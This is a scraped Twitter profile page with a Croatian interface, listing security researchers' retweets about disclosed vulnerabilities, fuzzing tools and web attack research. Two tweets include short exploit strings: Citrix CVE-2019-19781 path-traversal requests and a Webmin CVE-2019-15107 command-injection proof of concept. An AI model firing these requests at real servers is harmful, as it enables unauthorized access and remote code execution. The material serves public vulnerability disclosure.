Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @sam_in_cube
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @sam_in_cube
-
Semyon Rozhkov proslijedio/la je Tweet
CVE-2019-19781 Citrix path traversal base on vpns folder Example: GET /vpn/../vpns/services.html GET /vpn/../vpns/cfg/smb.conf patch >> HTTP/1.1 403 Forbidden no patch >> HTTP/1.1 200 OK [global] encrypt passwords = yes name resolve order = lmhosts wins host bcastpic.twitter.com/a6ehfTRIaJ
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
We're looking to hire a web vulnerability researcher to join
@garethheyes and I on the@Burp_Suite research team, and share their knowledge with the community via@WebSecAcademyhttps://portswigger.net/careers/web-vulnerability-researcher …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
I finally wrote a small tool I've wanted for a long time: A parallel testcase minimizer. It's called halfempty, and I'm already finding it useful as part of my fuzzing workflow. /cc
@lcamtuf https://github.com/googleprojectzero/halfempty …pic.twitter.com/qleqrRbTDy
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
WebKit: Universal XSS in HTMLFrameElementBase::isURLAllowed https://bugs.chromium.org/p/project-zero/issues/detail?id=1916 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
You can now exec Python/JS in Hackvertor! - <
@javascript_0("output = input.toUpperCase()","6dcc747e16b8c4e561617b2717c24f45")><@/javascript_0> load a file: <@python_1("/mypath/test.py","6dcc747e16b8c4e561617b2717c24f45")><@/python_1> The hash identifies the tag was added by youhttps://twitter.com/BApp_Store/status/1187365491603574793 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
Looks like the HTTP Request Smuggling vulnerability in Golang had an interesting knock-on impact for Kuberneteshttps://blog.paloaltonetworks.com/2019/10/cloud-kubernetes-vulnerabilities/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
Got ideas for achievements that can be unlocked via participation in Google's VRPs? Submit your ideas here:https://forms.gle/R2c3VMc6gVjrVDpv8 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
I learned this week how I can perform an error-based
#xssearch without using any#javascript! It takes advantage of *alternative text* when an object cannot be rendered and then styling it with a *custom font*. My full payload to the chall: https://gist.github.com/terjanq/33bbb8828839994c848c3b76c1ac67b1 …#xsleakspic.twitter.com/3CGE6m8jgJ
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
We are proud to launch our brand new interactive XSS cheatsheet featuring novel vectors from
@garethheyeshttps://portswigger.net/research/one-xss-cheatsheet-to-rule-them-all …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
lastpass: bypassing do_popupregister() leaks credentials from previous site https://bugs.chromium.org/p/project-zero/issues/detail?id=1930 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
LastPass could leak the last used credentials due to a cache not being updated. This was because you can bypass the tab credential cache being populated by including the login form in an unexpected way!https://twitter.com/ProjectZeroBugs/status/1173400848430321664 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
Scientist: hey you're back early Diver: ocean's haunted Scientist: what? Diver: *loading a pistol and getting back in the submarine* ocean's hauntedhttps://twitter.com/galacticdad/status/1169860754482159616 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
"Webmin 0day remote code execution" Tl;Dr: Lack of input validation in the reset password function allows RCE (CVE-2019-15107). Over 13 0000 vulnerable on Shodan. PoC: /password_reset.cgi user=root&pam&expired&old=wrong | id https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
Here's a video of the exploit I wrote, I actually had to write a custom rudimentary scripting language
https://www.youtube.com/watch?v=r3vrzzDpmhc …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
Breaking
#Google researcher@Taviso discloses 20-year-old 'unpatched' vulnerabilities affecting all versions of#Microsoft Windows—from XP to the latest Windows 10. Details ➤ https://thehackernews.com/2019/08/ctfmon-windows-vulnerabilities.html … It could allow attackers to gain SYSTEM privileges on a targeted PC.pic.twitter.com/WB7TVZSDKz
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Semyon Rozhkov proslijedio/la je Tweet
Let’s fuzz the world together! Join us with
@Dor3s and@MShudrak at August 22nd, 5pm, San Francisco https://www.eventbrite.com/e/fuzzing-bay-area-meetup-tickets-66626376285?ref=eios …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
HTTP Desync Attacks: Request Smuggling Rebornhttps://portswigger.net/blog/http-desync-attacks-request-smuggling-reborn …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
One of the stranger bugs I found last year while developing Param Minerhttps://hackerone.com/reports/310105
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Semyon Rozhkov proslijedio/la je Tweet
"Passive income" opportunity for security researchers: submit your fuzzers to the Chrome Fuzzer Program and receive rewards for vulnerabilities found (with an extra $1K bonus for each vuln).
@NedWilliamson teaches how to do it successfully https://security.googleblog.com/2019/07/chrome-fuzzer-program-update-and-how-to.html …#fuzzing#chromeHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.